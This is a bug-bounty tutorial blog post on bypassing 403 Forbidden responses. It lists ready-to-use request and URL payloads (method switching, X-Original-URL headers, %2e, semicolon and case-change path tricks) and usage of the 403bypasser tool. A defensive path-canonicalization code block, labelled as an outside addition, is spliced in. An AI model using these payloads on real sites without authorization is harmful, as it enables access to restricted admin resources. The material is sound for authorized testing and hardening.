#14 Bypass — 403 Forbidden

Uttam Gupta
Nov 3, 2022


Hello to all beginner bug hunters. This is Uttam Gupta, and today's topic from the bypasses series is 403 Forbidden. A 403 Forbidden error occurs when you do not have permission to access a web page or some other resource on a web server. It often happens that while bug hunting you go deep into the target and hit a 403 Forbidden or Permission Denied response, and most beginners stop there. But if you can bypass it, you can often reach the target's admin page or another trusted page and continue hunting on it, and you can get a bounty reward by reporting it.

Today I will show you some manual ways to bypass it, and also a Linux tool that runs the bypass attempts automatically. So, let's start.

Manual Bypass

Request Method Manipulation: convert the GET request to a POST request.

GET /admin HTTP/1.1
Host: target.com

How to apply this

POST /admin HTTP/1.1
Host: target.com

Overriding the Target URL via Non-Standard Headers: X-Original-URL and X-Rewrite-URL

GET /admin HTTP/1.1
Host: target.com

How to apply this

GET /anything HTTP/1.1
Host: target.com
X-Original-URL: /admin
OR
GET /anything HTTP/1.1
Host: target.com
X-Rewrite-URL: /admin

Appending %2e after the first slash:

http://target.com/admin => 403

How to apply this

http://target.com/%2e/admin => 200

Try adding a dot (.), slash (/) or semicolon (;) to the URL:

http://target.com/secret => 403

How to apply this

http://target.com/secret/. => 200
http://target.com//secret// => 200
http://target.com/./secret/.. => 200
http://target.com/;/secret => 200
http://target.com/.;/secret => 200
http://target.com//;//secret => 200

Add “..;/” after the directory name:

http://target.com/admin

How to apply this

http://target.com/admin..;/ 

Try uppercasing letters in the URL:

http://target.com/admin

How to apply this

http://target.com/aDmIN

Via Web Cache Poisoning:

GET /anything HTTP/1.1
Host: victim.com
X-Original-URL: /admin
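All of the manual variants above work against the same weakness: the component that says "403" decides on the raw request (its method, its exact path string, its headers), while the backend routes on a decoded, normalized path, or on an override header. As an added example, not from this post or from the 403bypasser project, here is the check a front-end ACL or middleware needs to make so that GET and POST, /%2e/admin, /aDmIN, //;//secret and an X-Original-URL override are all judged against the same canonical path the backend will actually serve. The protected prefixes, header names and request samples are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed for this example: prefixes the front-end ACL is meant to protect.
PROTECTED_PREFIXES = ("/admin", "/secret")
# Headers some backends treat as a path override; any client can send them.
OVERRIDE_HEADERS = ("x-original-url", "x-rewrite-url")


def canonicalize(path: str) -> str:
    """Reduce a request path to the form a lenient backend would route on."""
    prev = None
    while prev != path:                  # decode %2e, %252e ... until stable
        prev, path = path, unquote(path)
    path = re.sub(r";[^/]*", "", path)   # drop ';' path parameters (/.;/, /;/)
    path = re.sub(r"/+", "/", path)      # collapse // and ///
    segments = []
    for seg in path.split("/"):          # resolve '.' and '..' like a filesystem
        if seg in ("", "."):
            continue
        if seg == "..":
            if segments:
                segments.pop()
            continue
        segments.append(seg)
    return "/" + "/".join(segments).lower()   # case-fold for case-insensitive backends


def effective_path(path: str, headers: dict) -> str:
    """Path the backend will actually serve once override headers are honoured."""
    lowered = {k.lower(): v for k, v in headers.items()}
    for name in OVERRIDE_HEADERS:
        if name in lowered:              # safest fix is to strip these at the edge;
            return lowered[name]         # if they are forwarded, authorize on their value
    return path


def is_protected(method: str, path: str, headers: dict) -> bool:
    """ACL verdict that is independent of method, encoding and separators."""
    canon = canonicalize(effective_path(path, headers))
    # method is intentionally ignored: GET vs POST must not change the verdict
    return any(canon == p or canon.startswith(p + "/") for p in PROTECTED_PREFIXES)


if __name__ == "__main__":
    for m, p, h in [("GET", "/admin", {}), ("POST", "/admin", {}),
                    ("GET", "/%2e/admin", {}), ("GET", "/aDmIN", {}),
                    ("GET", "//;//secret", {}),
                    ("GET", "/anything", {"X-Original-URL": "/admin"})]:
        print(m, p, h, "->", "deny" if is_protected(m, p, h) else "allow")
```

The canonicalizer must match the behaviour of the backend it fronts (Tomcat, IIS and nginx each tolerate different forms), so the safest deployment is to reject requests whose raw path differs from its canonical form and to strip override headers at the edge rather than trying to enumerate every variant.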

Automated Bypass

Tool: 403bypasser

Installation:

1. Clone the repository to your machine: git clone https://github.com/yunemse48/403bypasser.git

2. Install the required modules: pip install -r requirements.txt

See this page for a brief installation guide:

https://www.geeksforgeeks.org/403bypasser-bypass-403-restricted-directory/

Usage:

It is very easy to use. Let's see.

After installation, run this command:

python3 403bypasser.py -u https://target.com -d xyz

In this command, -u is your target URL and -d is the path that returns 403 Forbidden and that you want to bypass, such as the admin page, config.php, etc.

Now, let's see a live example.

You will be able to see how this tool works. The tool tries each technique one by one: Request Method Manipulation, Path Manipulation, Overriding the Target URL via Non-Standard Headers, and other headers and values.

I hope I have taught you something new again. Thank you for reading this blog. HAVE A NICE DAY AND HAPPY HACKING.

P.S. I am looking for a job, my email is uttamgupta1802@gmail.com.
